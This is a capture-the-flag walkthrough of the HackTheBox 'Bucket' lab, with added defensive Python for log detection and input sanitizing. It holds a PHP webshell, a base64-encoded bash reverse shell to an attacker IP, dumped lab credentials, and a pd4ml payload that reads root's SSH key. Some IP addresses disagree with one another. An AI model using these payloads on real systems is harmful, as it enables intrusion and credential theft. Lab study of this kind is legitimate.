Bucket on HackTheBox

Before all

Victim’s IP : 10.10.10.212
Victim’s Host : *.bucket.htb
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

rustscan -a 10.10.10.212 --ulimit 5000 -- -sC -sV -Pn

Result

Open 10.10.11.212:22
Open 10.10.11.212:80

directory enumeration

Browsing the site shows images that fail to load; their source points at another vhost, s3.bucket.htb.
Brute-force its directories:
Command

dirsearch --url 'http://s3.bucket.htb/' --exclude-status=404

Result

[00:36:47] Starting: 
[00:36:50] 200 - 2B - /%2e%2e;/test
[00:36:51] 200 - 2B - /+CSCOE+/logon.html
[00:36:51] 200 - 2B - /+CSCOE+/session_password.html
[00:36:51] 200 - 2B - /+CSCOT+/oem
[00:36:51] 200 - 2B - /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
[00:36:51] 200 - 2B - /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
[00:36:51] 200 - 2B - /+CSCOT+/translation
[00:37:13] 200 - 2B - /;/admin
[00:37:13] 200 - 2B - /;/json
[00:37:13] 200 - 2B - /;/login
[00:38:28] 200 - 54B - /health
[00:38:38] 500 - 290B - /latest/meta-data/hostname
[00:39:15] 403 - 278B - /server-status
[00:39:15] 403 - 278B - /server-status/
[00:39:18] 500 - 158B - /shell.php
[00:39:18] 500 - 158B - /shell.jsp
[00:39:18] 200 - 0B - /shell
[00:39:18] 500 - 158B - /shell.js
[00:39:18] 500 - 158B - /shell.sh
[00:39:18] 500 - 158B - /shell.html
[00:39:18] 500 - 158B - /shell.aspx
[00:39:18] 200 - 13KB - /shell/
[00:39:18] 500 - 158B - /shellz.php

The /shell path stands out; opening it reveals a DynamoDB web shell.

Exploit

Enumerate DynamoDB

Command

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/shell/

Result

{
"TableNames": [
"users"
]
}

With the table name users in hand, dump its contents:
Command

aws dynamodb scan --endpoint-url http://s3.bucket.htb/shell/ --table users

Result

{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}

That yields a whole set of usernames and passwords.

Abuse s3 bucket

List the buckets and check their permissions
Command

aws s3 ls --endpoint-url=http://s3.bucket.htb 
aws s3api get-bucket-acl --bucket adserver --endpoint-url=http://s3.bucket.htb

Result

{
"Owner": {
"DisplayName": "webfile",
"ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a"
},
"Grants": [
{
"Grantee": {
"ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a",
"Type": "CanonicalUser"
},
"Permission": "FULL_CONTROL"
}
]
}

The ACL grants FULL_CONTROL, so a PHP webshell can be written straight into the bucket:
shell.php

<?php system($_POST['cmd']); ?>

Command

aws s3 cp shell.php s3://adserver --endpoint-url=http://s3.bucket.htb
curl 'http://bucket.htb/shell.php' -d 'cmd=echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNS85OTk5IDA%2BJjEK+|+base64+-d+|+bash'

Get Shell on port 9999
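From the defender's side, the whole initial-access chain above leaves a clear trail in the web server logs: AWS CLI calls to the DynamoDB endpoint carry an X-Amz-Target header naming the operation, the webshell arrives as a PUT of a .php key into the bucket, and the same file name is then requested on the main vhost. The Python below is an added example, not part of this writeup or of the box. It assumes an Apache LogFormat that records the User-Agent and X-Amz-Target headers, and the log lines it parses are constructed to mirror the steps above; the rule names and the path-style PUT are also assumptions.

```python
import re

# Assumed Apache LogFormat on the bucket vhosts (an assumption, not from the writeup):
#   LogFormat "%h %t \"%r\" %>s \"%{User-Agent}i\" \"%{X-Amz-Target}i\"" aws_api
# X-Amz-Target is the header the AWS CLI/SDKs use to name the DynamoDB operation.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)" "(?P<target>[^"]*)"$'
)

# Object keys that Apache would execute if the bucket doubles as the web root.
WEB_EXEC = re.compile(r"\.(php|phtml|phar|jsp|aspx?)$", re.IGNORECASE)

# DynamoDB operations worth an alert when they reach the web server from outside.
DYNAMO_OPS = {"ListTables", "Scan", "CreateTable", "PutItem"}

# Constructed sample lines mirroring the steps of this writeup (not real logs).
SAMPLE_LOG = """\
10.10.10.5 [20/Feb/2021:00:30:01 +0000] "GET /health HTTP/1.1" 200 "Mozilla/5.0" "-"
10.10.14.14 [20/Feb/2021:00:40:12 +0000] "POST /shell/ HTTP/1.1" 200 "aws-cli/2.1.0 Python/3.8.5" "DynamoDB_20120810.ListTables"
10.10.14.14 [20/Feb/2021:00:40:31 +0000] "POST /shell/ HTTP/1.1" 200 "aws-cli/2.1.0 Python/3.8.5" "DynamoDB_20120810.Scan"
10.10.14.14 [20/Feb/2021:00:42:02 +0000] "PUT /adserver/shell.php HTTP/1.1" 200 "aws-cli/2.1.0 Python/3.8.5" "-"
10.10.14.14 [20/Feb/2021:00:42:40 +0000] "POST /shell.php HTTP/1.1" 200 "curl/7.74.0" "-"
10.10.10.5 [20/Feb/2021:00:43:00 +0000] "GET /index.php HTTP/1.1" 200 "Mozilla/5.0" "-"
""".splitlines()


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in the assumed format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Walk the log in order and return (source_ip, rule, path) findings.

    Rules:
      dynamodb-<Op>     an AWS SDK DynamoDB call reached the web server at all
      webshell-upload   a PUT wrote a web-executable key into a bucket
      webshell-invoked  a file name seen in such an upload was later requested
    """
    findings = []
    uploaded = set()  # lower-cased basenames of executable keys written so far
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        path, target = e["path"], e["target"]
        basename = path.rsplit("/", 1)[-1].lower()
        if target.startswith("DynamoDB_"):
            op = target.partition(".")[2]
            if op in DYNAMO_OPS:
                findings.append((e["ip"], f"dynamodb-{op}", path))
            continue
        if e["method"] == "PUT" and WEB_EXEC.search(path):
            uploaded.add(basename)
            findings.append((e["ip"], "webshell-upload", path))
            continue
        if basename in uploaded and e["method"] in {"GET", "POST"}:
            findings.append((e["ip"], "webshell-invoked", path))
    return findings


def sources(findings):
    """Count findings per source IP so the noisiest client stands out."""
    counts = {}
    for ip, _rule, _path in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, rule, path in detect(SAMPLE_LOG):
        print(f"{ip:<14} {rule:<20} {path}")
    print(sources(detect(SAMPLE_LOG)))
```

The stateful third rule is the useful one: a PUT of a .php key on its own may be a developer deploying, but the same basename being requested on the public vhost minutes later is the webshell being used. Beyond detection, the root cause is that the DynamoDB and S3 endpoint accepted requests with no real authentication and was reachable on a public vhost at all.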

Privilege Escalation

Exploit PD4ML

Note the application path /var/www/bucket-app
index.php

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);

$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));

foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
else
{
?>

In short: if a table named alerts exists with an item whose title matches {"S":"Ransomware"}, the item's data attribute is written out as an HTML file and parsed by pd4ml.
As described in this post: https://www.aurian.com.au/blog/2021/07/24/preaching-to-converted/
the pd4ml attachment tag can be used to read arbitrary files.
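The application-side fix is to stop treating the data attribute as trusted HTML before it reaches the renderer. The Python below is an added example, not the box's code and not a PD4ML API: it shows a rejection check for renderer-specific pd4ml: tags and file: URIs, plus an allowlist sanitizer that rebuilds the fragment keeping only plain formatting tags with no attributes. The ALLOWED_TAGS set, the indicator names and the render_input_for helper (standing in for the file_put_contents step in index.php) are assumptions chosen for illustration; the attachment payload from this writeup is reused only as a test vector.

```python
import html
import re
from html.parser import HTMLParser

# Assumed allowlist for alert bodies (an assumption, not the app's): plain formatting only,
# and no attributes, so nothing can point the renderer at a URI.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "br", "ul", "ol", "li", "h1", "h2", "h3"}

# Markers that mean the fragment is trying to drive the renderer rather than describe an alert.
ESCAPE_INDICATORS = [
    ("pd4ml-tag", re.compile(r"<\s*/?\s*pd4ml:", re.IGNORECASE)),  # e.g. pd4ml:attachment
    ("file-uri", re.compile(r"\bfile:", re.IGNORECASE)),            # local file URIs
]

# The attachment payload from this writeup, used here only as a test vector.
SAMPLE_PAYLOAD = ('<pd4ml:attachment description="/root/.ssh/id_rsa" icon="graph">'
                  'file:///root/.ssh/id_rsa</pd4ml:attachment>')


def renderer_escape_indicators(fragment):
    """Names of the indicators present; a non-empty list means the item must not be rendered."""
    return [name for name, rx in ESCAPE_INDICATORS if rx.search(fragment)]


class AlertSanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allowlisted tags (without attributes); text is escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []    # pieces of the rebuilt fragment
        self.dropped = []  # tag names that were removed, for logging

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}>")  # attributes are never copied through
        else:
            self.dropped.append(tag)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped


def sanitize_alert(fragment):
    """Return (clean_html, dropped_tags) for an untrusted alert body."""
    p = AlertSanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.parts), p.dropped


def render_input_for(item):
    """Decide, for one DynamoDB item as returned by Scan, what may go to the PDF renderer.

    Returns the sanitized HTML, or None when the item should be skipped and logged instead
    of being written under files/ (hypothetical replacement for the file_put_contents call).
    """
    data = item.get("data", {}).get("S", "")
    if renderer_escape_indicators(data):
        return None
    clean, _dropped = sanitize_alert(data)
    return clean


if __name__ == "__main__":
    print(renderer_escape_indicators(SAMPLE_PAYLOAD))
    print(sanitize_alert(SAMPLE_PAYLOAD))
    print(render_input_for({"title": {"S": "Ransomware"}, "data": {"S": "<i>ok</i> & fine"}}))
```

Rejecting first and sanitizing second is deliberate: the indicator check gives a loggable signal that someone is feeding renderer directives into the alerts table, while the allowlist handles everything the check did not anticipate. Neither helps if the table itself can be created by anyone, so the unauthenticated DynamoDB endpoint behind index.php is the other half of the fix.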
Exploit

# Read Data
aws dynamodb create-table \
--table-name=alerts \
--attribute-definitions=AttributeName=title,AttributeType=S \
--key-schema=AttributeName=title,KeyType=HASH \
--billing-mode=PAY_PER_REQUEST \
--endpoint-url=http://s3.bucket.htb

# Write Data
aws dynamodb put-item \
--table-name=alerts \
--item='{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"/root/.ssh/id_rsa\" icon=\"graph\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' \
--endpoint-url=http://s3.bucket.htb

# Trigger Action in index.php
curl localhost:8000/index.php -d 'action=get_alerts'

# Get PDF File
wget localhost:8000/files/result.pdf -O pwned.pdf

Finally, open the attachment in the PDF to recover id_rsa and log in with it.

Command

sudo ssh root@bucket.htb -i id_rsa